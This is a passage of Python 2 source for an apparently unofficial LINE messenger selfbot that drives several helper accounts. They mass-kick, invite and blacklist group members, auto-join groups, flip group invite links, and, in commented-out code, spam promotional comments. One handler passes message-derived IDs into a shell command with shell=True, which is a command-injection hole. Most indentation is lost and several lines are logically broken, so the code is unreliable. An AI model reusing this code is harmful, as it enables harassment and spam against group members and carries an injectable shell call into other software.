req = urllib2.Request(url, headers = headers)
response = urllib2.urlopen(req)
page = response.read()
return page
except:
return"Page Not found"
#Finding 'Next Image' from the given raw page
def _images_get_next_item(s):
start_line = s.find('rg_di')
if start_line == -1: #If no links are found then give an error!
end_quote = 0
link = "no_links"
return link, end_quote
else:
start_line = s.find('"class="rg_meta"')
start_content = s.find('"ou"',start_line+90)
end_content = s.find(',"ow"',start_content-90)
content_raw = str(s[start_content+6:end_content-1])
return content_raw, end_content
#Getting all links with the help of '_images_get_next_image'
def _images_get_all_items(page):
items = []
while True:
item, end_content = _images_get_next_item(page)
if item == "no_links":
break
else:
items.append(item) #Append all the links in the list named 'Links'
time.sleep(0.1) #Timer could be used to slow down the request for image downloads
page = page[end_content:]
return items
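# Illustrative pairing of the two helpers above; the Google Images search URL
# format here is an assumption, not something defined in this script:
#   raw = download_page("https://www.google.com/search?q=kucing&tbm=isch")
#   links = _images_get_all_items(raw)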
#def autolike():
# for zx in range(0,100):
# hasil = cl.activity(limit=100)
# if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
# try:
# cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Auto Like By TobyBots!!\nID LINE : line://ti/p/~tobyg74\nIG : instagram.com/tobygaming74")
# print "DiLike"
# except:
# pass
# else:
# print "Sudah DiLike"
# time.sleep(500)
#thread2 = threading.Thread(target=autolike)
#thread2.daemon = True
#thread2.start()
#def autolike():
# for zx in range(0,100):
# hasil = cl.activity(limit=100)
# if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
# try:
# cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
# print "Like"
# except:
# pass
# else:
# print "Already Liked"
#time.sleep(500)
#thread2 = threading.Thread(target=autolike)
#thread2.daemon = True
#thread2.start()
def yt(query):
with requests.session() as s:
isi = []
if query == "":
query = "S1B tanysyz"
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
for a in soup.select('.yt-lockup-title > a[title]'):
if '&list=' not in a['href']:
if 'watch?v' in a['href']:
b = a['href'].replace('watch?v=', '')
isi += ['youtu.be' + b]
return isi
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
return '%02d Jam %02d Menit %02d Detik' % (hours, mins, secs)
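# Example: waktu(3661) returns '01 Jam 01 Menit 01 Detik' (1 hour, 1 minute, 1 second).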
def upload_tempimage(client):
'''
Upload a picture of a kitten. We don't ship one, so get creative!
'''
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
return image
messageReq = {}  # per-recipient counter of messages built by sendMessage below
def sendMessage(to, text, contentMetadata={}, contentType=0):
    mes = Message()
    mes.to, mes.from_ = to, profile.mid
    mes.text = text
    mes.contentType, mes.contentMetadata = contentType, contentMetadata
    if to not in messageReq:
        messageReq[to] = -1
    messageReq[to] += 1
    cl.sendMessage(mes)  # dispatch the built message through the main client
def sendImage(self, to_, path):
M = Message(to=to_,contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M_id = self.Talk.client.sendMessage(0,M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
return True
def sendImageWithURL(self, to_, url):
    path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), random.randint(0, 9))
    r = requests.get(url, stream=True)
    if r.status_code == 200:
        with open(path, 'wb') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download image failure.')
try:
self.sendImage(to_, path)
except Exception as e:
raise e
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def post_content(self, urls, data=None, files=None):
return self._session.post(urls, headers=self._headers, data=data, files=files)
def NOTIFIED_READ_MESSAGE(op):
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n9§9" + Name
wait2['ROM'][op.param1][op.param2] = "9§9" + Name
else:
pass
except:
pass
def sendAudio(self, to_, path):
M = Message(to=to_, text=None, contentType = 3)
M_id = self.Talk.client.sendMessage(0,M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'audio',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
print r
if r.status_code != 201:
raise Exception('Upload audio failure.')
def sendAudioWithURL(self, to_, url):
    path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), random.randint(0, 9))
    r = requests.get(url, stream=True)
    if r.status_code == 200:
        with open(path, 'wb') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download audio failure.')
try:
self.sendAudio(to_, path)
except Exception as e:
raise e
def sendVoice(self, to_, path):
M = Message(to=to_, text=None, contentType = 3)
M.contentPreview = None
M_id = self._client.sendMessage(0,M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'voice_message',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'audio',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload voice failure.')
return True
def mention(to,nama):
aa = ""
bb = ""
strt = int(12)
akh = int(12)
nm = nama
#print nm
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "► @c \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "「Mention」\n"+bb
msg.contentMetadata = {'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
#print msg
try:
cl.sendMessage(msg)
except Exception as error:
print error
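# Illustrative call (the mids are placeholders): mention(msg.to, ["uaaaa...", "ubbbb..."])
# sends a "「Mention」" message that tags every mid in the list.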
def removeAllMessages(self, lastMessageId):
return self._client.removeAllMessages(0, lastMessageId)
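# bot(op) is the main operation dispatcher: each incoming LINE operation (invite,
# join, kick, message, ...) is matched on op.type and handled according to the
# toggles stored in the wait / wait2 dicts above.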
def bot(op):
try:
if op.type == 0:
return
if op.type == 13:
if wait["auto"] == True:
cl.acceptGroupInvitation(op.param1)
cl.sendText(op.param1, "Terima Kasih Telah Invite 👉😊☆º°˚˚☆✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰☆º°˚˚☆(^ω^)\n\nby Kris ⭐👈 »»» http://line.me/ti/p/~krissthea «««\n\nSilahkan ketik [Help],dan gunakan dgn bijak")
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
ki.findAndAddContactsByMid(op.param1)
kc.findAndAddContactsByMid(op.param1)
kl.findAndAddContactsByMid(op.param1)
kk.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
cl.sendText(op.param1,str(wait["message"]))
kc.sendText(op.param1,str(wait["message"]))
cl.sendText(op.param1,str(wait["message"]))
#------------------NOTIFIED_READ_MESSAGE----------------#
if op.type == 55:
try:
group_id = op.param1
user_id=op.param2
subprocess.Popen('echo "'+ user_id+'|'+str(op.createdTime)+'" >> dataSeen/%s.txt' % group_id, shell=True, stdout=subprocess.PIPE, )
except Exception as e:
print e
if op.type == 26:
msg = op.message
if msg.text is None:
return
if "@"+cl.getProfile().displayName in msg.text:
if wait["tag"] == True:
tanya = msg.text.replace("@"+cl.getProfile().displayName,"")
jawab = ("Kenapa Tag Si "+cl.getProfile().displayName+"Kangen yah..!!!\nPC aja langsung biar anu hihi..!!\n[autoRespon]by=>SelfBot~Kris\n👉Cyber Army Bot👈","Nah ngetag lagi si "+cl.getProfile().displayName+" mending ajak mojok aja dari pada ngetag mulu.. wkwk...!!!\n[autoRespon]by=>SelfBot~Kris\n👉Cyber Army Bot👈")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
if op.type == 26:
msg = op.message
if msg.text is None:
return
if "@"+cl.getProfile().displayName in msg.text:
if wait["tag2"] == True:
tanya = msg.text.replace("@"+cl.getProfile().displayName,"")
jawab = "Kenapa Tag Si "+cl.getProfile().displayName+"Kangen yah..!!!\nPC aja langsung biar anu hihi..!!\n[autoRespon]by=>SelfBot~Kris\n👉Cyber Army Bot👈","Nah ngetag lagi si "+cl.getProfile().displayName+" mending ajak mojok aja dari pada ngetag mulu.. wkwk...!!!\n[autoRespon]by=>SelfBot~Kris\n👉Cyber Army Bot👈"
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.kickoutFromGroup(msg.to,[msg.from_])
else:
cl.inviteIntoGroup(op.param1,admin)
#cl.sendAudio(msg.to,jawaban)
#--CANCEL KICK--#
if op.type == 32:
if wait["Protectcancel"] == True:
                if op.param2 not in Bots and op.param2 not in admin:
cl.kickoutFromGroup(op.param1,[op.param2])
#------Invite User Kick start------#
if op.type == 13:
if wait["Protectguest"] == True:
if op.param2 not in Bots:
cl.cancelGroupInvitation(op.param1,[op.param3])
cl.kickoutFromGroup(op.param1,[op.param2])
#------Invite User Kick Finish------#
#----MemberProtection------#
if op.type == 19:
if wait["MProtection"] == True:
                if op.param2 not in Bots and op.param2 not in admin:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
#------Open QR Kick start------#
if op.type == 11:
if wait["QrProtect"] == True:
if op.param2 not in Bots:
G = cl.getGroup(op.param1)
G.preventJoinByTicket = True
cl.kickoutFromGroup(op.param1,[op.param3])
cl.updateGroup(G)
#------Open QR Kick finish-----#
if op.type == 17:
if wait["Wc"] == True:
if op.param2 in Bots:
return
ginfo = cl.getGroup(op.param1)
cl.sendText(op.param1, "╔═════════════\n║Selamat Datang Di " + str(ginfo.name) + "\n╠═════════════\n" + "║Founder =>>> " + str(ginfo.name) + " :\n║" + ginfo.creator.displayName + "\n╠═════════════\n" + "║😊Semoga Betah Kak 😘 \n╠═════════════\n║No Baper,No nakal,No Ngeyel ya..!! \n╚═════════════")
print "MEMBER HAS JOIN THE GROUP"
if op.type == 15:
if wait["Lv"] == True:
if op.param2 in Bots:
return
cl.sendText(op.param1, "╔═════════════\n║Baper Tuh Orang :v \n╠══════���══════\n║Belum di Anu Kayanya 😊 \n╚═════════════")
print "MEMBER HAS LEFT THE GROUP"
#-----------------------------------------------
if op.type == 11:
if op.param3 == '1':
if op.param1 in wait['pname']:
try:
G = cl.getGroup(op.param1)
except:
try:
G = cl.getGroup(op.param1)
except:
try:
G = cl.getGroup(op.param1)
except:
try:
G = kc.getGroup(op.param1)
except:
try:
G = kl.getGroup(op.param1)
except:
try:
G = kt.getGroup(op.param1)
except:
pass
G.name = wait['pro_name'][op.param1]
try:
cl.updateGroup(G)
except:
try:
ki.updateGroup(G)
except:
try:
kk.updateGroup(G)
except:
try:
kc.updateGroup(G)
except:
try:
kl.updateGroup(G)
except:
try:
kt.updateGroup(G)
except:
pass
if op.param2 in Bots:
pass
else:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kt.kickoutFromGroup(op.param1,[op.param2])
except:
pass
cl.sendText(op.param1,"please do not change group name-_-")
if op.type == 26:
msg = op.message
if msg.contentType == 13:
if wait["winvite"] == True:
if msg.from_ in admin or owner:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
cl.sendText(msg.to,"-> " + _name + " was here")
break
elif invite in wait["blacklist"]:
cl.sendText(msg.to,"Sorry, " + _name + " On Blacklist")
cl.sendText(msg.to,"Call my owner to use command !, \n➡Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
cl.inviteIntoGroup(msg.to,[target])
cl.sendText(msg.to,"Done Invite : \n➡" + _name)
wait["winvite"] = False
break
except:
try:
ki.findAndAddContactsByMid(invite)
ki.inviteIntoGroup(op.param1,[invite])
wait["winvite"] = False
except:
cl.sendText(msg.to,"Negative, Error detected")
wait["winvite"] = False
break
#--------------NOTIFIED_INVITE_INTO_GROUP----------------
if op.type == 13:
print op.param3
if op.param3 in mid:
if op.param2 in creator:
cl.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in creator:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in creator:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in creator:
kc.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in mid:
if op.param2 in Amid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Bmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Cmid:
cl.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Amid:
if op.param2 in mid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Bmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Cmid:
ki.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Bmid:
if op.param2 in mid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Amid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Cmid:
kk.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Cmid:
if op.param2 in mid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Amid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Bmid:
kc.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.type == 13:
if mid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner or mid:
cl.acceptGroupInvitation(op.param1)
else:
cl.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Amid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner or mid:
ki.acceptGroupInvitation(op.param1)
else:
ki.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
#====================================================
if mid in op.param3:
if wait["autoJoin"] == True:
cl.acceptGroupInvitation(op.param1)
else:
cl.rejectGroupInvitation(op.param1)
else:
if wait["autoCancel"] == True:
if op.param3 in admin:
pass
else:
cl.cancelGroupInvitation(op.param1, [op.param3])
else:
if op.param3 in wait["blacklist"]:
cl.cancelGroupInvitation(op.param1, [op.param3])
cl.sendText(op.param1, "Itu kicker jgn di invite!")
else:
pass
#-----------------NOTIFIED_KICKOUT_FROM_GROUP-----------------
if op.type == 19:
if op.param3 in admin:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,admin)
cl.inviteIntoGroup(op.param1,[op.param3])
else:
pass
if op.type == 19:
if op.param3 in baby:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,baby)
cl.inviteIntoGroup(op.param1,[op.param3])
else:
pass
if op.type == 19:
if op.param3 in baby:
if op.param2 in baby:
cl.inviteIntoGroup(op.param1,baby)
cl.inviteIntoGroup(op.param1,[op.param3])
#------NOTIFIED_KICKOUT_FROM_GROUP-----------------
if op.type == 19:
if wait["autoKick"] == True:
if op.param2 in admin:
pass
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in admin:
pass
else:
wait["blacklist"][op.param2] = True
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in admin:
pass
else:
wait["blacklist"][op.param2] = True
#====================================================
if mid in op.param3:
if op.param2 in Bots:
pass
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ti = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Amid in op.param3:
if op.param2 in Bots:
pass
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
X = cl.getGroup(op.param1)
X.preventJoinByTicket = False
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki.getGroup(op.param1)
G.preventJoinByTicket = True
ki.updateGroup(G)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
#------------------NOTIFIED_KICKOUT_FROM_GROUP-----------------
if op.type == 19:
if op.param3 in admin or owner:
if op.param2 not in Bots:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
wait["blacklist"][op.param2] = True
except:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
wait["blacklist"][op.param2] = True
#================================================================
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 26:
msg = op.message
#-----------------------------------------
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata("line://home/post?userMid="+mid+"&postId="+"new_post")
cl.like(url[25:58], url[66:], likeType=1001)
if op.type == 26:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"already")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"decided not to comment")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"deleted")
cl.sendText(msg.to,"deleted")
cl.sendText(msg.to,"deleted")
kc.sendText(msg.to,"deleted")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"It is not in the black list")
cl.sendText(msg.to,"It is not in the black list")
cl.sendText(msg.to,"It is not in the black list")
kc.sendText(msg.to,"It is not in the black list")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"already")
cl.sendText(msg.to,"already")
cl.sendText(msg.to,"already")
kc.sendText(msg.to,"already")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"aded")
cl.sendText(msg.to,"aded")
cl.sendText(msg.to,"aded")
kc.sendText(msg.to,"aded")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"deleted")
cl.sendText(msg.to,"deleted")
cl.sendText(msg.to,"deleted")
kc.sendText(msg.to,"deleted")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"It is not in the black list")
cl.sendText(msg.to,"It is not in the black list")
cl.sendText(msg.to,"It is not in the black list")
kc.sendText(msg.to,"It is not in the black list")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL�0�10��9�0�16�0�69�0�3�0�4\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["help","Help"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,helpMessage)
else:
cl.sendText(msg.to,helpt)
#--------------------------------------------------
elif msg.text in ["Key1"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,translateMessage)
else:
cl.sendText(msg.to,helpt)
#--------------------------------------------------
elif msg.text in ["Key7"]:
if msg.from_ in admin or owner:
if wait["lang"] == "JP":
cl.sendText(msg.to,botMessage)
else:
cl.sendText(msg.to,helpt)
#--------------------------------------------------
elif msg.text in ["Key2"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,socmedMessage)
else:
cl.sendText(msg.to,helpt)
#--------------------------------------------------
elif msg.text in ["Key4"]:
if msg.from_ in admin or owner:
if wait["lang"] == "JP":
cl.sendText(msg.to,protectMessage)
else:
cl.sendText(msg.to,helpt)
#--------------------------------------------------
elif msg.text in ["Key5"]:
if msg.from_ in admin or owner:
if wait["lang"] == "JP":
cl.sendText(msg.to,settingMessage)
else:
cl.sendText(msg.to,helpt)
#--------------------------------------------------
elif msg.text in ["Key6"]:
if msg.from_ in admin or owner:
if wait["lang"] == "JP":
cl.sendText(msg.to,stealMessage)
else:
cl.sendText(msg.to,helpt)
#--------------------------------------------------
elif msg.text in ["Key3"]:
if msg.from_ in admin or owner:
if wait["lang"] == "JP":
cl.sendText(msg.to,giftMessage)
else:
cl.sendText(msg.to,helpt)
#--------------------------------------------------
elif ("Gn " in msg.text):
if msg.from_ in admin or owner:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Gn ","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
#--------------------------------------------------
elif ("Kr1 gn " in msg.text):
if msg.from_ in admin or owner:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Kr1 gn ","")
ki.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
#--------------------------------------------------
elif ("Kr2 gn " in msg.text):
if msg.from_ in admin or owner:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Kr2 gn ","")
kk.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
#--------------------------------------------------
elif ("Kr3 gn " in msg.text):
if msg.from_ in admin or owner:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Kr3 gn ","")
kc.updateGroup(X)
else:
kc.sendText(msg.to,"It can't be used besides the group.")
#--------------------------------------------------
elif "Kick " in msg.text:
if msg.from_ in admin or owner:
midd = msg.text.replace("Kick ","")
cl.kickoutFromGroup(msg.to,[midd])
#--------------------------------------------------
elif "Kr1 kick " in msg.text:
if msg.from_ in admin or owner:
midd = msg.text.replace("Kr1 kick ","")
ki.kickoutFromGroup(msg.to,[midd])
#--------------------------------------------------
elif "Kr2 kick " in msg.text:
if msg.from_ in admin or owner:
midd = msg.text.replace("Kr2 kick ","")
kk.kickoutFromGroup(msg.to,[midd])
#--------------------------------------------------
elif "Kr3 kick " in msg.text:
if msg.from_ in admin or owner:
midd = msg.text.replace("Kr3 kick ","")
kc.kickoutFromGroup(msg.to,[midd])
#--------------------------------------------------
elif "Invite " in msg.text:
if msg.from_ in admin or owner:
midd = msg.text.replace("Invite ","")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
#--------------------------------------------------
elif "Kr1 invite " in msg.text:
if msg.from_ in admin or owner:
midd = msg.text.replace("Kr1 invite ","")
ki.findAndAddContactsByMid(midd)
ki.inviteIntoGroup(msg.to,[midd])
#--------------------------------------------------
elif "Kr2 invite " in msg.text:
if msg.from_ in admin or owner:
midd = msg.text.replace("Kr2 invite ","")
kk.findAndAddContactsByMid(midd)
kk.inviteIntoGroup(msg.to,[midd])
#--------------------------------------------------
elif "Kr3 invite " in msg.text:
if msg.from_ in admin or owner:
midd = msg.text.replace("Kr3 invite ","")
kc.findAndAddContactsByMid(midd)
kc.inviteIntoGroup(msg.to,[midd])
#--------------------------------------------------
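# Contact cards: "Me", "K1" and "Kr2" send the contact card (contentType 13) of the main bot or the respective helper bot.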
elif msg.text in ["Me"]:
if msg.from_ in admin or owner:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
#--------------------------------------------------
elif msg.text in ["K1"]:
if msg.from_ in admin or owner:
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
ki.sendMessage(msg)
#--------------------------------------------------
elif msg.text in ["Kr2"]:
if msg.from_ in admin or owner:
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
kk.sendMessage(msg)
#--------------------------------------------------
elif msg.text in ["cancel","Kr cancel"]:
if msg.from_ in admin or owner:
if msg.toType == 2:
G = k3.getGroup(msg.to)
if G.invitee is not None:
gInviMids = [contact.mid for contact in G.invitee]
k3.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
k3.sendText(msg.to,"No one is inviting")
else:
k3.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
k3.sendText(msg.to,"Can not be used outside the group")
else:
k3.sendText(msg.to,"Not for use less than group")
#--------------------------------------------------
#elif "gurl" == msg.text:
#print cl.getGroup(msg.to)
##cl.sendMessage(msg)
#--------------------------------------------------
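# Group invite link: the "ourl"/"curl" (link on/off) family toggles preventJoinByTicket to open or close the group's ticket URL.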
elif msg.text in ["Ourl","Link on","Urlon"]:
if msg.from_ in admin or owner:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#--------------------------------------------------
elif msg.text in ["Kr1 ourl","Kr1 link on"]:
if msg.from_ in admin or owner:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
ki.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done Chivas")
else:
cl.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#--------------------------------------------------
elif msg.text in ["Kr2 ourl","Kr2 link on"]:
if msg.from_ in admin or owner:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
kk.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done Chivas")
else:
cl.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#--------------------------------------------------
